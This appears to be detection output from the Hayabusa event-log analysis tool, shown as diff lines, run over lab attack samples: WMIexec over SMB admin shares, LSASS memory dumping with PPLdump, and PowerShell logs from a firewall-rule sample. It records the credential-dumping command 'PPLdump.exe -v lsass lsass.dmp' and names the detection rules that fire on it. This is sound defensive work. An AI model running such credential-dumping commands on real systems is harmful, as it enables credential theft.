+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c318,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c326,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c336,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.417 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.418 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.427 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.083 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.084 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.307 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:27.649 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:27.653 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.260 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 19:09:29.667 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.671 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.674 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.677 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.684 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.684 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.757 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.758 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.761 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
